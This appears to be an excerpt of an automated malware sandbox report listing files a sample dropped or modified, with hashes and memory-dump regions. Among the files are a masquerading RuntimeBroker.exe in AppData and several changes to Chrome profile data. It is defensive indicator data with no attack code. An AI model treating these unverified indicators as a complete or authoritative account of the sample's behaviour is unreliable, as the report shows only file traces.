C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | d0c46cad6c0778401e21910bd6b56b70 |
| SHA1 | 7be418951ea96326aca445b8dfe449b2bfa0dca6 |
| SHA256 | 9600b3fdf0565ccb49e21656aa4b24d7c18f776bfd04d9ee984b134707550f02 |
| SHA512 | 057531b468f7fbbb2175a696a8aab274dec0d17d9f71df309edcff35e064f3378050066a3df47ccd03048fac461594ec75e3d4fe64f9dd79949d129f51e02949 |
memory/1264-353-0x0000000000F20000-0x0000000001374000-memory.dmp
memory/1264-354-0x0000000000F20000-0x0000000001374000-memory.dmp
memory/1712-363-0x00000000055D0000-0x0000000005927000-memory.dmp
memory/1712-365-0x0000000006030000-0x000000000607C000-memory.dmp
memory/1712-368-0x0000000070860000-0x00000000708AC000-memory.dmp
memory/1712-377-0x0000000006DF0000-0x0000000006E94000-memory.dmp
memory/1712-378-0x0000000007040000-0x0000000007051000-memory.dmp
memory/1712-379-0x0000000007080000-0x0000000007095000-memory.dmp
memory/812-381-0x0000000007400000-0x000000000740A000-memory.dmp
C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe
| MD5 | 913967b216326e36a08010fb70f9dba3 |
| SHA1 | 7b6f8c2eb5b443e03c212b85c2f0edb9c76ad2bf |
| SHA256 | 8d880758549220154d2ff4ee578f2b49527c5fb76a07d55237b61e30bcc09e3a |
| SHA512 | c6fcb98d9fd509e9834fc3fba143bd36d41869cc104fbce5354951f0a6756156e34a30796baaa130dd45de3ed96e039ec14716716f6da4569915c7ef2d2b6c33 |
memory/440-395-0x0000000000A10000-0x0000000000A18000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RuntimeBroker.exe.log
| MD5 | bb27934be8860266d478c13f2d65f45e |
| SHA1 | a69a0e171864dcac9ade1b04fc0313e6b4024ccb |
| SHA256 | 85ad0d9909461517acf2e24ff116ca350e9b7000b4eefb23aa3647423c9745b4 |
| SHA512 | 87dd77feac509a25b30c76c119752cc25020cca9c53276c2082aef2a8c75670ef67e1e70024a63d44ae442b64f4bc464aee6691e80c525376bb7421929cfa3bb |
memory/812-399-0x0000000008B50000-0x0000000009168000-memory.dmp
memory/812-400-0x0000000008560000-0x0000000008572000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | 0b279f03824c9871c69ba114e5026571 |
| SHA1 | f9e56fbb8f649c0865ac3ca13e87e6f3b34deed4 |
| SHA256 | 5589fc0904352d4b32ee8b134458adf756954e9fa75f23589dfd3798df5c3565 |
| SHA512 | 3c2f3e274bc97cd7b5ec3c71bac5d2f8eed2033688a76e266e293aa94924a89ce01fe3a8ddc5223bd43879935890092e08bfb14bfc0d02d80ecc6e16b3abfbe6 |
memory/812-401-0x00000000085C0000-0x00000000085FC000-memory.dmp
memory/812-407-0x0000000008600000-0x000000000864C000-memory.dmp
memory/812-408-0x0000000008790000-0x000000000889A000-memory.dmp
memory/1264-411-0x0000000000F20000-0x0000000001374000-memory.dmp
memory/812-412-0x0000000000F20000-0x0000000001374000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 4370791b7738498a58224cf99714687b |
| SHA1 | 1a61148df065e5d426e68462fa02e7f3e4a7623b |
| SHA256 | 35bfdb01dfe7f399a32791afeb78d46330387ef28a9038d2a20c1d390b7a6473 |
| SHA512 | e1e593891ce047005ead029d50ab35b3c741bd3d421a0d554d986082fa779c7e0837c8c853d98bc867491ffafdb3c545ecd14a71032249a76eb16c69a88cf3d9 |
memory/844-436-0x0000000000F10000-0x0000000001364000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\BUILD45_PROTECTED.EXE.log
| MD5 | 209be68810b961fd9592a820991df838 |
| SHA1 | 4f9c9e290cc05a040faf33dba60fdbfc49b337c9 |
| SHA256 | 68ee34fdd6d8fbd347165a9ae9f6806d80be06390550bd6901a91fcc16022713 |
| SHA512 | dca8e8cb612ff163779a9e65a7eb1cbdc4933560c34f83bd5e1924c7ffbdd69f0ba7c7ff30ab9d22d8c91cb528013eb2472c2432226f27fe3665a08f76a20b95 |
memory/844-439-0x0000000000F10000-0x0000000001364000-memory.dmp
memory/844-440-0x0000000000F10000-0x0000000001364000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | b40d13069525cd0254d44a62edcc63d3 |
| SHA1 | 18ad0dd9c07bf746f75e1190fe74d1c1395c0e15 |
| SHA256 | 41819aac1e2ce848ce8d36a7d0f735518d41f6b43a47a5ddefc3c31c965883ca |
| SHA512 | 479b9db9e055b1d5f8bd4eaba226d2004f898dc1afa63e213708a15f49333af791f5fddaf806db7294dba3c906265dd2a5185179fafe8842afc4dad04b6c2633 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 25b5dfa92f950c6902e0ba4ba1d1dff0 |
| SHA1 | 0e8fa7c0e233d35f911ca60881b1a53281bfc502 |
| SHA256 | e1e37eac0cf58bade05503cd9ec2e44def48c4588679598e81c705e3dc37beca |
| SHA512 | 131a7fdb1f485331256e20fe930d2e13315ebd54a19823192b766b8f74e82eeda8427e72d0a8df9c4ca9ee3017d5e0bd8887aac81a6a0f4f50dbbf7f4bc6e30e |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 6344564097353c8e7e68991fffa80d88 |
| SHA1 | 2ac4d108a30ec3fbd2938b0563eb912415ea7c62 |
| SHA256 | d0af6d69f8bc0c98e9fb61dead6327bbc8b4f5292529313515382d8f883de0da |
| SHA512 | e2b37a9001a91cb05483d72f88bd70a61ca5655939c2290fd1580710eec9d8d26a5fedbcb5223f5413b5dcc46f1d8b6b408e57be0e4ad4b37b55cbce9023a303 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 80707036df540b6657f9d443b449e3c3 |
| SHA1 | b3e7d5d97274942164bf93c8c4b8a9b68713f46f |
| SHA256 | 6651e5f976619cef991deef61776cf43d4c4b3d7c551dd2192b647df71586ab0 |
| SHA512 | 65e41e9e730fed4f7a7d3f6f35875a16948b897f87c8c70b371fd0ac7f0951814f6a75e7698665194bbc65a3665a684e7be229e7e24193b50483ae7e55eebf4f |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 4914eb0b2ff51bfa48484b5cc8454218 |
| SHA1 | 6a7c3e36ce53b42497884d4c4a3bda438dd4374b |
| SHA256 | 7e510fc9344ef239ab1ab650dc95bb25fd44e2efba8b8246a3ac17880ee8b69e |
| SHA512 | 83ab35f622f4a5040ca5cb615a30f83bb0741449225f1fd1815b6923e225c28241d0c02d34f83f743349a5e57f84ca1c6f44016797a93d5985be41d11be79500 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 3c0fe86517be16d2b0a671148c0274d2 |
| SHA1 | bd7a487a037395e9ede9e76b4a455fdf386ba8db |
| SHA256 | 5f85aaa0472b8ae98352b7295cd59357e3e585b2299c540e9a8b5848a8d6b302 |
| SHA512 | 642bc58c0a5682b45056e837be0dc5d1cd8c400f0e73f20d17c19720fb1fdae132b86873100955e9d65f72f1d481704b84c30d440ca53898c6d6d6f106b74f0a |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | cef328ddb1ee8916e7a658919323edd8 |
| SHA1 | a676234d426917535e174f85eabe4ef8b88256a5 |
| SHA256 | a1b5b7ada8ebc910f20f91ada3991d3321104e9da598c958b1edac9f9aca0e90 |
| SHA512 | 747400c20ca5b5fd1b54bc24e75e6a78f15af61df263be932d2ee7b2f34731c2de8ce03b2706954fb098c1ac36f0b761cf37e418738fa91f2a8ea78572f545cb |
memory/844-524-0x0000000000F10000-0x0000000001364000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 7f4b1fc5f03e555dd1d3a41d2e281df5 |
| SHA1 | 39caf04398294fecede98c5ba69942bec9d192d5 |
| SHA256 | 160cea4a341b0cbc9b5ec12966969b11ec400a98a0b3717ce51cb4108ddc021f |
| SHA512 | 82839b6e1a4ee8e00ade5f761358cd237124b16a8b0989442a0c3077730505a03f6ce5af419e5f8fc80f0fdc1d3669c80fbe6ac64c68452f5d2041d9371eca1d |
C:\Users\Admin\AppData\Local\D3DSCache\cb00da9ba77862e\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx
| MD5 | b5ad5caaaee00cb8cf445427975ae66c |
| SHA1 | dcde6527290a326e048f9c3a85280d3fa71e1e22 |
| SHA256 | b6409b9d55ce242ff022f7a2d86ae8eff873daabf3a0506031712b8baa6197b8 |
| SHA512 | 92f7fbbcbbea769b1af6dd7e75577be3eb8bb4a4a6f8a9288d6da4014e1ea309ee649a7b089be09ba27866e175ab6f6a912413256d7e13eaf60f6f30e492ce7f |
C:\Users\Admin\AppData\Local\D3DSCache\cb00da9ba77862e\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.val
| MD5 | d222b77a61527f2c177b0869e7babc24 |
| SHA1 | 3f23acb984307a4aeba41ebbb70439c97ad1f268 |
| SHA256 | 80dc3ffa698e4ff2e916f97983b5eae79470203e91cb684c5ccd4ff1a465d747 |
| SHA512 | d17d836ea77aeaff4cd01f9c7523345167a4a6bc62528aac74acde12679f48079d75d159e9cea2e614da50e83c2dcd92c374c899ea6c4fe8e5513d9bf06c01ff |
C:\Users\Admin\AppData\Local\D3DSCache\cb00da9ba77862e\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.lock
| MD5 | f49655f856acb8884cc0ace29216f511 |
| SHA1 | cb0f1f87ec0455ec349aaa950c600475ac7b7b6b |
| SHA256 | 7852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba |
| SHA512 | 599e93d25b174524495ed29653052b3590133096404873318f05fd68f4c9a5c9a3b30574551141fbb73d7329d6be342699a17f3ae84554bab784776dfda2d5f8 |
memory/812-552-0x0000000009400000-0x0000000009450000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 814f74b67cb54bce630ff953063c17a7 |
| SHA1 | e6e41a3a4099ac0d7d838b533c0aadbdcc1f5157 |
| SHA256 | dc5ddaf810c2baf29b682529b2681bbe92b56e169411cb1d9c315ae395458896 |
| SHA512 | cef3d38b2192dba11dbc6feb4d36389fe7818830a8de0f7672e6174125a48457db2f62e323b153ce98a552a0074a423fb8688826993f54d9f5d8991cc49efd01 |
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AC\BackgroundTransferApi\34993fdc-d5c1-4029-8357-ec2e83b54ee5.down_data
| MD5 | 5683c0028832cae4ef93ca39c8ac5029 |
| SHA1 | 248755e4e1db552e0b6f8651b04ca6d1b31a86fb |
| SHA256 | 855abd360d8a8d6974eba92b70cbd09ce519bc8773439993f9ab37cb6847309e |
| SHA512 | aba434bd29be191c823b02ea9b639beb10647bbe7759bbffdaa790dfb1ec2c58d74c525ef11aacda209e4effe322d1d3a07b115446c8914b07a3bce4d8a0e2c3 |
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.dat
| MD5 | b5ec1c651d538125bbad8ae7b5878883 |
| SHA1 | fc51a9862cd962c1dcf92da77deca73aa79f0c04 |
| SHA256 | 7e4836c483ec272727cb1e69f6d1769be0f8ea3783dab5fc6846bea18f8c5114 |
| SHA512 | ce915256b7339ce5ae8c12864b66f8c83c4ef31185e46d5877776a4fb21ae18a58c742af77312d54ca77f42d33c63e9b6ff868c078d11d423dac4b72cb599f2e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 6c93f2b9a2e38cc932ddaae8c67c5ce1 |
| SHA1 | 9cd6b112de34ca1cd07a181c62dadbf28fe2f5c2 |
| SHA256 | 0b4d2cad4c5044cd840db78ff3612e7f3bebc8bc2bf032da7d3fe9607700db2a |
| SHA512 | 668898a2d7d16300099ffb811a8291e539ff15a982ec9ee161b1ef9236f58a89356e6877210bb249c2caddec3614471f23b6a27a4a71e621a652e7632d871d6d |
C:\Windows\SysWOW64\Microsoft\lib_ec0265501148482a90b3681c1b46d412\SharpDX.dll
| MD5 | ffb4b61cc11bec6d48226027c2c26704 |
| SHA1 | fa8b9e344accbdc4dffa9b5d821d23f0716da29e |
| SHA256 | 061542ff3fb36039b7bbffdf3e07b66176b264c1dfd834a14b09c08620717303 |
| SHA512 | 48aa6130bf1f5bd6de19256bbdf754c0158b43dd122cec47bb801a7a7b56f2da268bfdec24d135621764a23278ead3dcc35911a057e2dfa55a348bae8ef7b8a9 |
memory/812-594-0x00000000082D0000-0x0000000008314000-memory.dmp
memory/812-599-0x0000000008370000-0x00000000083BA000-memory.dmp
memory/812-604-0x00000000094B0000-0x000000000950A000-memory.dmp
memory/812-609-0x0000000007970000-0x0000000007996000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 50b467816eafc4e2ecf859e8fdc0d326 |
| SHA1 | 12041b300d21c3a3be208ffa6eb67dbb89f06929 |
| SHA256 | a3e16eb05961cb7c21080c40181ce8b83e4355fd5e23b8a2b90bf813f5b91fae |
| SHA512 | a133ec81607d1213a8246cd94df3248fd80130416cb909aa78b7fcb3bf71cd4407a44718dc4d0f4ab5bf0392aa5235bca56e8c6080c7ad65f01fc830af2dc0b2 |
memory/3492-624-0x00000200726E0000-0x00000200726E1000-memory.dmp
memory/3492-623-0x00000200726E0000-0x00000200726E1000-memory.dmp
memory/3492-622-0x00000200726E0000-0x00000200726E1000-memory.dmp
memory/3492-634-0x00000200726E0000-0x00000200726E1000-memory.dmp
memory/3492-633-0x00000200726E0000-0x00000200726E1000-memory.dmp
memory/3492-632-0x00000200726E0000-0x00000200726E1000-memory.dmp
memory/3492-631-0x00000200726E0000-0x00000200726E1000-memory.dmp
memory/3492-630-0x00000200726E0000-0x00000200726E1000-memory.dmp
memory/3492-628-0x00000200726E0000-0x00000200726E1000-memory.dmp
memory/3492-629-0x00000200726E0000-0x00000200726E1000-memory.dmp
memory/812-638-0x0000000009670000-0x00000000097C4000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | cf26da2310bc7ea3204bdd70e2ec27f6 |
| SHA1 | 8446d48e13c0c0077fdae9b5048c77b4812ecc6e |
| SHA256 | 51186fc1edb9451152ead63b97ceac7c74dd02f5bca3eb2b9b2f5b8d66e7d35b |
| SHA512 | 066f144b6cfee833495f84d2c369b0f3073d22245fbf8196578104aa52e02474ac9ec95223e50798800bb08a73a16e433f77256adaf0b262a1c59bec9d24514e |
memory/812-653-0x00000000660C0000-0x000000006614F000-memory.dmp